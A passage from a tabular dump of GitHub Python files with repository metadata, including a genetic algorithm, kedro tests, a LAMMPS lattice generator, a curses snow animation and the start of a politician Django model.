hexsha stringlengths 40 40 | size int64 4 1.02M | ext stringclasses 8 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 209 | max_stars_repo_name stringlengths 5 121 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 209 | max_issues_repo_name stringlengths 5 121 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 209 | max_forks_repo_name stringlengths 5 121 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 1.02M | avg_line_length float64 1.07 66.1k | max_line_length int64 4 266k | alphanum_fraction float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c99d3c7e28e9dea78a86ef5a775934a3c6b5969f | 3,164 | py | Python | AG1.py | ingratosocial/gaia | 0f08648c9ddec0e6b9fc19ad760b56683c34a0d9 | [
"MIT"
] | null | null | null | AG1.py | ingratosocial/gaia | 0f08648c9ddec0e6b9fc19ad760b56683c34a0d9 | [
"MIT"
] | null | null | null | AG1.py | ingratosocial/gaia | 0f08648c9ddec0e6b9fc19ad760b56683c34a0d9 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import random
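# Simple genetic algorithm: evolve a population of integer lists toward `modelo`.
# Fitness = number of positions matching the target; the top `progenitores` individuals
# are kept, the rest are rebuilt by one-point crossover and mutated with probability `mutacion`.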
modelo = [1,2,3,4,5] # Target (objective) individual
largo = len(modelo) # Length of each individual's genetic material
num = 10 # Number of individuals in each generation
progenitores = 3 # Individuals used for reproduction, must be > 2
mutacion = 0.2 # Mutation probability
generaciones = 50
print('\nTarget:\n', modelo)
def individuo(min, max):
    return [random.randint(min, max) for i in range(largo)]
def crearPoblacion():
    return [individuo(1,9) for i in range(num)]
def calcularFitness(individuo):
fitness = 0
for i in range(len(individuo)):
if individuo[i] == modelo[i]:
fitness += 1
return fitness
def seleccion_reproduccion(poblacion):
    puntuados = [(calcularFitness(i), i) for i in poblacion] # Compute each individual's fitness and store it as (fitness, individual) pairs
    puntuados = [i[1] for i in sorted(puntuados)] # Sort the pairs from lowest to highest fitness
    poblacion = puntuados
    seleccionados = puntuados[(len(puntuados)-progenitores):] # Keep the individuals with the highest fitness
    for i in range(len(poblacion)-progenitores): # The best-fitness individuals are left untouched
        punto = random.randint(1,largo-1) # One-point crossover
        padre = random.sample(seleccionados, 2) # Pick two parents at random
        poblacion[i][:punto] = padre[0][:punto] # Mix the parents' genetic material, replacing the previous population
        poblacion[i][punto:] = padre[1][punto:]
return poblacion
def mutation(poblacion):
for i in range(len(poblacion)-progenitores):
        if random.random() <= mutacion: # Every individual except the parents has a chance to mutate
            punto = random.randint(1,largo-1) # Pick a gene position at random
            nuevo_valor = random.randint(1,9) # Draw a new value
            while nuevo_valor == poblacion[i][punto]: # Make sure it differs from the previous value
                nuevo_valor = random.randint(1,9) # Keep trying
poblacion[i][punto] = nuevo_valor
return poblacion
poblacion = crearPoblacion() # Create the initial population
print('\nInitial population:\n', poblacion)
for i in range(generaciones): # Evolve the population for the desired number of generations
    poblacion = seleccion_reproduccion(poblacion) # Natural-selection step
    poblacion = mutation(poblacion)
print('\nFinal population:\n', poblacion) # Show the final population
input('\nPress Enter to exit.') | 60.846154 | 150 | 0.541719 |
5fd261b876fba34b2aec8e5cd4490a043642fc54 | 3,387 | py | Python | nimble/preprocessing.py | risteon/nimble | 7ba28d3f2cc08501dc68ae4d63cf82980005df75 | [
"MIT"
] | 1 | 2017-01-20T14:04:39.000Z | 2017-01-20T14:04:39.000Z | nimble/preprocessing.py | risteon/nimble | 7ba28d3f2cc08501dc68ae4d63cf82980005df75 | [
"MIT"
] | null | null | null | nimble/preprocessing.py | risteon/nimble | 7ba28d3f2cc08501dc68ae4d63cf82980005df75 | [
"MIT"
] | null | null | null | from __future__ import division
import numpy as np
from scipy.misc import imresize
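# NOTE: scipy.misc.imresize was deprecated in SciPy 1.0 and removed in 1.3,
# so this module needs SciPy < 1.3 (imresize itself relies on Pillow).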
# scale Label
SCALING_FACTOR = 0.1
def convert_to_scaled_floats(x):
r = x.astype(np.float32)
r /= 255
return r
def flip_axis(x, axis):
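    # Reverse the array along the given axis: swap it to the front, slice with a
    # negative step, then swap it back.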
x = np.asarray(x).swapaxes(axis, 0)
x = x[::-1, ...]
x = x.swapaxes(0, axis)
return x
def resize_image(image, shape):
return imresize(image, shape, interp='lanczos')
def resize_and_crop_image(image, shape):
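    # Scale the image up just enough to cover the target shape, then crop the excess:
    # horizontally centered, or keeping the lower part of the picture when rows are dropped.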
if image.shape == shape:
return image
rows, cols, _ = image.shape
rows_n, cols_n, _ = shape
resize_fraction = float(max(rows_n/rows, cols_n/cols))
res = imresize(image, resize_fraction, interp='bicubic')
d_rows, d_cols = res.shape[0] - rows_n, res.shape[1] - cols_n
if d_rows == 0:
s = int(d_cols/2)
r = d_cols - s
return res[:, s: -r, :]
elif d_cols == 0:
# choose to return the lower part of the picture
# TODO: generalize this behavior?
#s = int(d_rows / 2)
#r = d_rows - s
return res[d_rows:, :, :]
else:
assert False
class PreprocessedSequenceGenerator:
def __init__(self, batch_generator,
to_scaled_floats=False,
scaling_factor=SCALING_FACTOR,
resize=False,
flip_horizontal=False,
flip_vertical=False,
flip_sequence=False):
self.__dict__.update(locals())
self._generator = batch_generator
# Assume dimension ordering: [(batch,) frame, row, column, channel]
# these indices are counted excluding (!) the batch dimension
self.img_frame_index = 0
self.img_row_index = 1
self.img_col_index = 2
def flow(self, prob=0.5):
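        # Pull batches from the wrapped generator, apply the batch-wide transforms
        # (resize/crop, float scaling, label scaling), then per-sample random flips,
        # and yield the transformed batch with its labels.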
for batch, labels in self._generator:
# these transforms can be performed on the whole batch
transf_batch, transf_labels = self._transform(batch, labels)
# iterate over data in batch for random transforms
for i in range(transf_batch.shape[0]):
transf_batch[i, ...], transf_labels[i, ...] =\
self._random_transform(transf_batch[i, ...], transf_labels[i, ...], prob)
yield transf_batch, transf_labels
def _transform(self, batch, labels):
if self.resize is not False:
transformed = np.empty((batch.shape[0], batch.shape[1]) + self.resize, batch.dtype)
for i in np.ndindex(batch.shape[0], batch.shape[1]):
transformed[i + (Ellipsis,)] = resize_and_crop_image(batch[i + (Ellipsis,)], self.resize)
else:
transformed = batch
if self.to_scaled_floats:
transformed = convert_to_scaled_floats(transformed)
# Todo: Scale down labels
labels *= self.scaling_factor
return transformed, labels
def _random_transform(self, data, label, prob):
if self.flip_horizontal:
if np.random.random() < prob:
data = flip_axis(data, self.img_col_index)
if self.flip_vertical:
if np.random.random() < prob:
data = flip_axis(data, self.img_row_index)
if self.flip_sequence:
if np.random.random() < prob:
data = flip_axis(data, self.img_frame_index)
label = -label
return data, label
| 33.205882 | 105 | 0.59876 |
33d23106b7c15c359021d10ef7b98a5f054373f1 | 6,516 | py | Python | tests/template/test_load_context_framework.py | laisbsc/kedro | abdb51f1fc5a247dc92cca63010cf06a581c5462 | [
"Apache-2.0"
] | null | null | null | tests/template/test_load_context_framework.py | laisbsc/kedro | abdb51f1fc5a247dc92cca63010cf06a581c5462 | [
"Apache-2.0"
] | null | null | null | tests/template/test_load_context_framework.py | laisbsc/kedro | abdb51f1fc5a247dc92cca63010cf06a581c5462 | [
"Apache-2.0"
] | 1 | 2021-08-22T08:16:22.000Z | 2021-08-22T08:16:22.000Z | # Copyright 2020 QuantumBlack Visual Analytics Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND
# NONINFRINGEMENT. IN NO EVENT WILL THE LICENSOR OR OTHER CONTRIBUTORS
# BE LIABLE FOR ANY CLAIM, DAMAGES, OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF, OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# The QuantumBlack Visual Analytics Limited ("QuantumBlack") name and logo
# (either separately or in combination, "QuantumBlack Trademarks") are
# trademarks of QuantumBlack. The License does not grant you any right or
# license to the QuantumBlack Trademarks. You may not use the QuantumBlack
# Trademarks or any confusingly similar mark as a trademark for your product,
# or use the QuantumBlack Trademarks in any other manner that might cause
# confusion in the marketplace, including but not limited to in advertising,
# on websites, or on software.
#
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import sys
import pytest
import toml
from kedro import __version__ as kedro_version
from kedro.framework.context import KedroContext, load_context
from kedro.framework.startup import _get_project_metadata
@pytest.fixture(autouse=True)
def mock_logging_config(mocker):
# Disable logging.config.dictConfig in KedroContext._setup_logging as
# it changes logging.config and affects other unit tests
mocker.patch("logging.config.dictConfig")
def _create_kedro_config(project_path, payload):
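    """Write ``payload`` as TOML to ``<project_path>/pyproject.toml``, creating parent dirs if needed."""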
kedro_conf = project_path / "pyproject.toml"
kedro_conf.parent.mkdir(parents=True, exist_ok=True)
toml_str = toml.dumps(payload)
kedro_conf.write_text(toml_str)
class MyContext(KedroContext):
pass
@pytest.mark.usefixtures("fake_project_cli")
class TestLoadContext:
def test_valid_context(self, fake_repo_path, mocker):
"""Test getting project context."""
get_project_metadata_mock = mocker.patch(
"kedro.framework.context.context._get_project_metadata",
wraps=_get_project_metadata,
)
result = load_context(str(fake_repo_path))
assert result.package_name == "fake_package"
assert str(fake_repo_path.resolve() / "src") in sys.path
get_project_metadata_mock.assert_called_with(fake_repo_path)
def test_valid_context_with_env(self, mocker, monkeypatch, fake_repo_path):
"""Test getting project context when Kedro config environment is
specified in the environment variable.
"""
mocker.patch("kedro.config.config.ConfigLoader.get")
monkeypatch.setenv("KEDRO_ENV", "my_fake_env")
result = load_context(str(fake_repo_path))
assert result.env == "my_fake_env"
def test_invalid_path(self, tmp_path):
"""Test for loading context from an invalid path. """
other_path = tmp_path / "other"
other_path.mkdir()
pattern = "Could not find the project configuration file 'pyproject.toml'"
with pytest.raises(RuntimeError, match=re.escape(pattern)):
load_context(str(other_path))
def test_pyproject_toml_has_missing_mandatory_keys(self, fake_repo_path):
payload = {
"tool": {
"kedro": {"fake_key": "fake_value", "project_version": kedro_version}
}
}
_create_kedro_config(fake_repo_path, payload)
pattern = (
"Missing required keys ['package_name', 'project_name'] "
"from 'pyproject.toml'."
)
with pytest.raises(RuntimeError, match=re.escape(pattern)):
load_context(str(fake_repo_path))
def test_pyproject_toml_has_extra_keys(self, fake_repo_path, fake_package_name):
project_name = "Test Project"
payload = {
"tool": {
"kedro": {
"project_version": kedro_version,
"project_name": project_name,
"package_name": fake_package_name,
"unexpected_key": "hello",
}
}
}
_create_kedro_config(fake_repo_path, payload)
pattern = (
"Found unexpected keys in 'pyproject.toml'. Make sure it "
"only contains the following keys: ['package_name', "
"'project_name', 'project_version', 'source_dir']."
)
with pytest.raises(RuntimeError, match=re.escape(pattern)):
load_context(str(fake_repo_path))
def test_settings_py_has_no_context_path(self, fake_repo_path):
"""Test for loading default `KedroContext` context. """
payload = {
"tool": {
"kedro": {
"package_name": "fake_package",
"project_version": kedro_version,
"project_name": "fake_project",
}
}
}
_create_kedro_config(fake_repo_path, payload)
context = load_context(str(fake_repo_path))
assert isinstance(context, KedroContext)
assert context.__class__ is KedroContext
def test_settings_py_has_context_path(
self, fake_repo_path, fake_package_name, mocker
):
"""Test for loading custom `ProjectContext` context. """
payload = {
"tool": {
"kedro": {
"package_name": fake_package_name,
"project_version": kedro_version,
"project_name": "fake_project",
}
}
}
_create_kedro_config(fake_repo_path, payload)
settings_mock = mocker.patch(
"kedro.framework.context.context._get_project_settings",
side_effect=(MyContext, (), (), "conf"),
)
context = load_context(str(fake_repo_path))
assert isinstance(context, KedroContext)
assert context.__class__ is not KedroContext
assert context.__class__.__name__ == "MyContext"
settings_mock.assert_called_once_with(
fake_package_name, "CONTEXT_CLASS", KedroContext
)
| 37.883721 | 85 | 0.663137 |
2e6935b106db7bde9e36ccafbddf9e11212051f9 | 1,012 | py | Python | src/flatten_nest_dict.py | kemingy/daily-coding-problem | 0839311ec0848f8f0b4a9edba817ecceb8f944a0 | [
"Unlicense"
] | 3 | 2019-03-06T03:14:56.000Z | 2020-01-07T16:00:48.000Z | src/flatten_nest_dict.py | kemingy/daily-coding-problem | 0839311ec0848f8f0b4a9edba817ecceb8f944a0 | [
"Unlicense"
] | null | null | null | src/flatten_nest_dict.py | kemingy/daily-coding-problem | 0839311ec0848f8f0b4a9edba817ecceb8f944a0 | [
"Unlicense"
] | null | null | null | # Write a function to flatten a nested dictionary. Namespace the keys with a
# period.
# For example, given the following dictionary:
# {
# "key": 3,
# "foo": {
# "a": 5,
# "bar": {
# "baz": 8
# }
# }
# }
# it should become:
# {
# "key": 3,
# "foo.a": 5,
# "foo.bar.baz": 8
# }
# You can assume keys do not contain dots in them, i.e. no clobbering will occur.
def flatten(nested):
result = {}
def helper(dic, prefix):
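        # Recursively walk nested dicts, joining keys with '.' and storing leaf values in `result`.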
for key in dic:
pre = key if not prefix else '{}.{}'.format(prefix, key)
if isinstance(dic[key], dict):
helper(dic[key], pre)
else:
result[pre] = dic[key]
helper(nested, '')
return result
if __name__ == '__main__':
nested = {
"key": 3,
"foo": {
"a": 5,
"bar": {
"baz": 8
}
}
}
print(flatten(nested)) | 21.083333 | 82 | 0.433794 |
dfd7747763dddc0808fb3dc0430ccf5efcb4ae6b | 2,122 | py | Python | test/test_edit_group.py | Nasts/pythin_training | 3a46b98e4130d26f9a8f32ea607b1a14b3ea13b8 | [
"Apache-2.0"
] | null | null | null | test/test_edit_group.py | Nasts/pythin_training | 3a46b98e4130d26f9a8f32ea607b1a14b3ea13b8 | [
"Apache-2.0"
] | 3 | 2020-02-08T14:31:55.000Z | 2020-02-09T17:12:27.000Z | test/test_edit_group.py | Nasts/pythin_training | 3a46b98e4130d26f9a8f32ea607b1a14b3ea13b8 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import random
import allure
from model.group import Group
def test_edit_group_name(app, db, check_ui):
if len(db.get_group_list()) == 0:
app.group.create(Group(name="new group"))
with allure.step("Given a group list"):
old_groups = db.get_group_list()
with allure.step("When I choice a group from the list"):
edit_group = random.choice(old_groups)
group = Group(name="New group edit", id=edit_group.id)
with allure.step("Then I edit a group by id"):
app.group.edit_group_by_id(edit_group.id, group)
with allure.step("Then the new group list is equal to the old list"):
new_groups = db.get_group_list()
assert len(old_groups) == len(new_groups)
old_groups[old_groups.index(edit_group)] = group
assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
if check_ui:
assert sorted(new_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)
# def test_edit_first_group(app):
# if app.group.count() == 0:
# app.group.create(Group(name="new group", header="new group", footer="new group"))
# old_groups = app.group.get_group_list()
# app.group.edit_first_group(Group(name="new edit group", header="new edit group", footer="new edit group"))
# new_groups = app.group.get_group_list()
# assert len(old_groups) == len(new_groups)
# def test_edit_group_name(app):
# if app.group.count() == 0:
# app.group.create(Group(name="new group"))
# old_groups = app.group.get_group_list()
# app.group.edit_first_group(Group(name="change new edit group"))
# new_groups = app.group.get_group_list()
# assert len(old_groups) == len(new_groups)
#
#
# def test_edit_group_header(app):
# if app.group.count() == 0:
# app.group.create(Group(header="new group"))
# old_groups = app.group.get_group_list()
# app.group.edit_first_group(Group(header="change new header group"))
# new_groups = app.group.get_group_list()
# assert len(old_groups) == len(new_groups)
| 40.037736 | 117 | 0.675778 |
5b7d37c603133f3af15ac966b150a65cde909f15 | 707 | py | Python | pyleecan/Methods/Machine/LamSlotWind/comp_output_geo.py | IrakozeFD/pyleecan | 5a93bd98755d880176c1ce8ac90f36ca1b907055 | [
"Apache-2.0"
] | 95 | 2019-01-23T04:19:45.000Z | 2022-03-17T18:22:10.000Z | pyleecan/Methods/Machine/LamSlotWind/comp_output_geo.py | IrakozeFD/pyleecan | 5a93bd98755d880176c1ce8ac90f36ca1b907055 | [
"Apache-2.0"
] | 366 | 2019-02-20T07:15:08.000Z | 2022-03-31T13:37:23.000Z | pyleecan/Methods/Machine/LamSlotWind/comp_output_geo.py | IrakozeFD/pyleecan | 5a93bd98755d880176c1ce8ac90f36ca1b907055 | [
"Apache-2.0"
] | 74 | 2019-01-24T01:47:31.000Z | 2022-02-25T05:44:42.000Z | # -*- coding: utf-8 -*-
from ....Classes.Lamination import Lamination
def comp_output_geo(self):
"""Compute the main geometry output
Parameters
----------
self : Lamination
A Lamination object
Returns
-------
output: OutGeoLam
        Main geometry output of the lamination
"""
output = Lamination.comp_output_geo(self)
output.Ksfill = self.comp_fill_factor()
if self.slot is None:
output.S_slot = 0
output.S_slot_wind = 0
else:
output.S_slot = self.slot.comp_surface()
output.S_slot_wind = self.slot.comp_surface_active()
# output.S_wind_act = self.winding.conductor.comp_surface_active()
return output
| 22.09375 | 70 | 0.640736 |
67d90c6021a67bbc7c4c084fc4085d44a75d80f5 | 1,778 | py | Python | generate_config.py | kaityo256/lammps_restart | 3b3d125af979b2a05f049892786bca1c8b25db59 | [
"MIT"
] | null | null | null | generate_config.py | kaityo256/lammps_restart | 3b3d125af979b2a05f049892786bca1c8b25db59 | [
"MIT"
] | null | null | null | generate_config.py | kaityo256/lammps_restart | 3b3d125af979b2a05f049892786bca1c8b25db59 | [
"MIT"
] | null | null | null | class Atom:
def __init__(self, x, y, z):
self.x = x
self.y = y
self.z = z
self.type = 1
self.vx = 0.0
self.vy = 0.0
self.vz = 0.0
def get_atoms():
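    # Build a face-centered-cubic (fcc) lattice: r**3 cubic cells of side s, each
    # contributing 4 atoms (corner plus three face-centered offsets of h = s/2).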
atoms = []
r = 4
s = 1.55
h = 0.5 * s
for ix in range(r):
for iy in range(r):
for iz in range(r):
x = ix * s
y = iy * s
z = iz * s
atoms.append(Atom(x, y, z))
atoms.append(Atom(x, y+h, z+h))
atoms.append(Atom(x+h, y, z+h))
atoms.append(Atom(x+h, y+h, z))
return atoms
def save_file(filename, atoms):
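    # Write a LAMMPS data file: a header with atom/type counts and box bounds,
    # followed by the Atoms and Velocities sections.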
with open(filename, "w") as f:
f.write("Position Data\n\n")
f.write("{} atoms\n".format(len(atoms)))
f.write("1 atom types\n\n")
f.write("0.0 6.00 xlo xhi\n")
f.write("0.0 6.00 ylo yhi\n")
f.write("0.0 6.00 zlo zhi\n")
f.write("\n")
f.write("Atoms\n\n")
for i, a in enumerate(atoms):
f.write("{} {} {} {} {}\n".format(i+1, a.type, a.x, a.y, a.z))
f.write("\n")
f.write("Velocities\n\n")
for i, a in enumerate(atoms):
f.write("{} {} {} {}\n".format(i+1, a.vx, a.vy, a.vz))
print(f"{len(atoms)} atoms")
print(f"Generated {filename}")
def find_range(atoms):
x = []
y = []
z = []
for a in atoms:
x.append(a.x)
y.append(a.y)
z.append(a.z)
print(f"{min(x)} < x < {max(x)}")
print(f"{min(y)} < y < {max(y)}")
print(f"{min(z)} < z < {max(z)}")
def run():
a = get_atoms()
find_range(a)
save_file("test.atoms", a)
if __name__ == "__main__":
run()
| 25.4 | 75 | 0.426322 |
5caff27a5fd164213ba71b7d4f7958789daa9f67 | 3,710 | py | Python | Game Palace/snow.py | BirdLQ/Game-Arcade | f61081250a617d33dccd4dc81fd469bfcbe0afe3 | [
"MIT"
] | 1 | 2021-01-08T01:44:23.000Z | 2021-01-08T01:44:23.000Z | Game Palace/snow.py | BirdLQ/Game-Arcade | f61081250a617d33dccd4dc81fd469bfcbe0afe3 | [
"MIT"
] | null | null | null | Game Palace/snow.py | BirdLQ/Game-Arcade | f61081250a617d33dccd4dc81fd469bfcbe0afe3 | [
"MIT"
] | null | null | null | import curses
import time
import random
from methods.ascii_dict import *
import main_menu
import gameoflife
snowflake = ['*', '+', '.']
def get_screen(stdscr):
h, w = stdscr.getmaxyx()
return (h, w)
def max_dimensions(window):
height, width = window.getmaxyx()
return height - 2, width - 1
def draw_moon(stdscr):
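    # Draw the ASCII moon in the top-right corner; clicking on it with the mouse
    # launches the Game of Life screen (gameoflife.gol_start).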
curses.mousemask(1)
moon_pos = []
moon = [
' ** ',
' *** ',
' ***',
' ***',
' *** ',
' ** ',
]
start_position = max_dimensions(stdscr)[1] - 10
stdscr.attrset(curses.color_pair(1))
for height, line in enumerate(moon, start=1):
for position, sym in enumerate(line, start=start_position):
stdscr.addch(height, position, sym)
moon_pos.append([height, position])
stdscr.attrset(curses.color_pair(0))
key = stdscr.getch()
if key == curses.KEY_MOUSE:
_, x, y, _, _ = curses.getmouse()
if [y, x] in moon_pos:
gameoflife.gol_start()
def build_cabin(stdscr):
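    # Place the ASCII cabin from smallHouse near the bottom of the screen, about
    # two-thirds of the way across, and return it as the initial snow dictionary
    # keyed by (row, col).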
h, w = get_screen(stdscr)
snowDict = {}
if h > 7 and w > 16:
for pos in smallHouse.keys():
if pos[0] == 0:
new_pos = (h-7,int(2*w/3+pos[1]))
if pos[0] == 1:
new_pos = (h-6,int(2*w/3+pos[1]))
if pos[0] == 2:
new_pos = (h-5,int(2*w/3+pos[1]))
if pos[0] == 3:
new_pos = (h-4,int(2*w/3+pos[1]))
if pos[0] == 4:
new_pos = (h-3,int(2*w/3+pos[1]))
if pos[0] == 5:
new_pos = (h-2,int(2*w/3+pos[1]))
snowDict[new_pos] = smallHouse[pos]
return snowDict
# create a snowflake! we need to know its starting position (in the x)
# which can be any value between 1 and max width, need to choose the char
def create_flake(stdscr):
w = get_screen(stdscr)[1]
x = random.randrange(1, w)
flake = random.choice(snowflake)
return (x, flake)
def new_snow(stdscr, snowDict):
w = get_screen(stdscr)[1]
x, flake = create_flake(stdscr)
# dont forget curses goes like "y,x" for some dumbass reason
snow = {(0,x): flake}
return snow
def draw_snow(stdscr, snowDict):
h = get_screen(stdscr)[0]
for key in snowDict.keys():
if key[0] < h-1:
stdscr.addch(key[0], key[1], snowDict[key])
else:
pass
"""
def pack_snow(stdscr, snowDict):
i, j = 0, 0
w, h = get_screen(stdscrn)
for j in range (1,w):
if snowDict[((h-3),j)] in snowflake:
for i in range(0,3):
snowDict[h-]
"""
def move_snow(stdscr, snowDict):
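    # Move each flake down one row unless it has reached the bottom row or the
    # cell directly below is already occupied by another flake.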
movedSnowDict = {}
h = get_screen(stdscr)[0]
for pos in snowDict.keys():
if pos[0] < h-2 and (pos[0]+1,pos[1]) not in snowDict.keys():
new_pos = (pos[0]+1, pos[1])
else:
new_pos = pos
movedSnowDict[new_pos] = snowDict[pos]
return movedSnowDict
def main(stdscr):
snowDict = build_cabin(stdscr)
curses.curs_set(0)
stdscr.nodelay(1)
curses.init_pair(1, curses.COLOR_YELLOW, curses.COLOR_BLACK)
msg = 'COMING SOON !'
y, x = get_screen(stdscr)[0]//2, get_screen(stdscr)[1]//2-len(msg)//2
while True:
key = stdscr.getch()
if key == curses.KEY_EXIT or key == 27:
break
stdscr.clear()
draw_moon(stdscr)
snowDict.update(new_snow(stdscr, snowDict))
draw_snow(stdscr, snowDict)
snowDict = move_snow(stdscr, snowDict)
stdscr.addstr(y, x, msg, curses.A_STANDOUT)
stdscr.refresh()
time.sleep(.1)
stdscr.nodelay(0)
main_menu.run_app()
def Snow():
curses.wrapper(main) | 28.75969 | 73 | 0.555256 |
ccec02eae104728a219e9b693bc609a17e3db765 | 775 | py | Python | svc_confusion_matrix.py | ksrinivs64/gntk | 861770b4fc48e48c71fa9283b2f84a06b80e7c05 | [
"MIT"
] | null | null | null | svc_confusion_matrix.py | ksrinivs64/gntk | 861770b4fc48e48c71fa9283b2f84a06b80e7c05 | [
"MIT"
] | null | null | null | svc_confusion_matrix.py | ksrinivs64/gntk | 861770b4fc48e48c71fa9283b2f84a06b80e7c05 | [
"MIT"
] | null | null | null | import numpy as np
from os.path import join
from sklearn.svm import SVC
from sklearn.model_selection import StratifiedKFold, cross_val_predict
from sklearn.metrics import confusion_matrix
import argparse
def search(data_dir):
gram = np.load(join(data_dir, 'gram.npy'))
gram /= gram.min()
y = np.load(join(data_dir, 'labels.npy'))
svc = SVC(C=0.09077853991937558, kernel='precomputed', cache_size=16000, max_iter=5e5)
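    # With kernel='precomputed' the gram matrix is used directly as the kernel,
    # and cross_val_predict slices its rows/columns for each CV fold.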
y_pred = cross_val_predict(svc, gram, y, cv=StratifiedKFold(n_splits=3))
conf_mat = confusion_matrix(y, y_pred)
print(conf_mat)
parser = argparse.ArgumentParser(description='hyper-parameter search')
parser.add_argument('--data_dir', type=str, required=True, help='data_dir')
args = parser.parse_args()
search(args.data_dir)
| 31 | 90 | 0.753548 |
383a9e78a3104dfd5233c7313af56f5df36d592b | 2,005 | py | Python | api/tests/test_sessions.py | jcuna/room-mgt | 84c071b5f3a2e6276f0064fd3f5a8ea3d87b58f7 | [
"MIT"
] | null | null | null | api/tests/test_sessions.py | jcuna/room-mgt | 84c071b5f3a2e6276f0064fd3f5a8ea3d87b58f7 | [
"MIT"
] | 21 | 2019-07-04T21:31:37.000Z | 2022-02-26T09:50:57.000Z | api/tests/test_sessions.py | jcuna/room-mgt | 84c071b5f3a2e6276f0064fd3f5a8ea3d87b58f7 | [
"MIT"
] | null | null | null | import io
from base64 import b64encode, b64decode
from sqlalchemy.exc import OperationalError
import pytest
from tests import endpoint
def test_install(no_db_client):
from dal.models import User
from dal.models import CompanyProfile
rv = no_db_client.get(endpoint('/user'))
assert rv.json['error'] == 'install'
assert rv.status_code == 501
    with pytest.raises(OperationalError) as ex:
        User.query.count()
    assert 'no such table' in str(ex.value)
no_db_client.get('/install')
post = {
'email': 'testuser@domain.com',
'password': 'master',
'first_name': 'John',
'last_name': 'Smith',
'company_name': 'Green CRN',
'address': '1500 Sample St. Sunnyside CA 98996',
'contact': '5555555555',
'logo': (io.BytesIO(b'12345asdfg'), 'test.png'),
}
rv = no_db_client.post('/install', data=post, content_type='multipart/form-data')
assert b'Redirecting' in rv.data
u = User.query.all()
assert len(u) == 1
assert u[0].email == 'testuser@domain.com'
c = CompanyProfile.query.all()
assert len(c) == 1
assert c[0].name == 'Green CRN'
assert isinstance(c[0].logo, bytes)
def test_fetch_company(no_db_client):
resp = no_db_client.get(endpoint('/company'))
assert 'name' in resp.json
assert 'logo' in resp.json
assert resp.json['logo'] is not None
assert isinstance(resp.json['logo'], str)
assert isinstance(b64decode(resp.json['logo']), bytes)
def test_no_session(no_db_client):
rv = no_db_client.get(endpoint('/user'))
assert rv.json['error'] == 'no session'
assert rv.status_code == 403
def test_login(no_db_client):
auth = {
'Authorization': 'Basic ' + b64encode(b'testuser@domain.com' + b':' + b'master').decode()
}
rv = no_db_client.post(endpoint('/login'), headers=auth)
assert rv.json['user']['email'] == 'testuser@domain.com'
assert 'value' in rv.json['token']
assert rv.status_code == 200
| 29.057971 | 97 | 0.645387 |
13bb86e6cbb0bb4a373def0a44261ffce202b90c | 66,341 | py | Python | politician/models.py | aucoeur/WeVoteServer | 7b30bdbb59d6e0c19abc81237aa42fba7de1a432 | [
"MIT"
] | 44 | 2015-11-19T04:52:39.000Z | 2021-03-17T02:08:26.000Z | politician/models.py | aucoeur/WeVoteServer | 7b30bdbb59d6e0c19abc81237aa42fba7de1a432 | [
"MIT"
] | 748 | 2015-09-03T04:18:33.000Z | 2022-03-10T14:08:10.000Z | politician/models.py | aucoeur/WeVoteServer | 7b30bdbb59d6e0c19abc81237aa42fba7de1a432 | [
"MIT"
] | 145 | 2015-09-19T10:10:44.000Z | 2022-03-04T21:01:12.000Z | # politician/models.py
# Brought to you by We Vote. Be good.
# -*- coding: UTF-8 -*-
import re
from django.db import models
from django.db.models import Q
import wevote_functions.admin
from exception.models import handle_exception, handle_record_found_more_than_one_exception
from tag.models import Tag
from wevote_functions.functions import convert_to_political_party_constant, \
display_full_name_with_correct_capitalization, \
extract_first_name_from_full_name, extract_middle_name_from_full_name, \
extract_last_name_from_full_name, extract_twitter_handle_from_text_string, positive_value_exists
from wevote_settings.models import fetch_next_we_vote_id_politician_integer, fetch_site_unique_id_prefix
FEMALE = 'F'
GENDER_NEUTRAL = 'N'
MALE = 'M'
UNKNOWN = 'U'
GENDER_CHOICES = (
(FEMALE, 'Female'),
(GENDER_NEUTRAL, 'Gender Neutral'),
(MALE, 'Male'),
(UNKNOWN, 'Unknown'),
)
logger = wevote_functions.admin.get_logger(__name__)
# When merging candidates, these are the fields we check for figure_out_candidate_conflict_values
POLITICIAN_UNIQUE_IDENTIFIERS = [
'ballotpedia_id',
'bioguide_id',
'birth_date',
'cspan_id',
'ctcl_uuid',
'first_name',
'gender',
'govtrack_id',
'house_history_id',
'icpsr_id',
'last_name',
'lis_id',
'maplight_id',
'middle_name',
'opensecrets_id',
'political_party',
'politician_email_address',
'politician_facebook_id',
'politician_googleplus_id',
'politician_name',
'politician_phone_number',
'politician_twitter_handle',
'politician_url',
'politician_youtube_id',
'state_code',
'thomas_id',
'vote_smart_id',
'vote_usa_politician_id',
'washington_post_id',
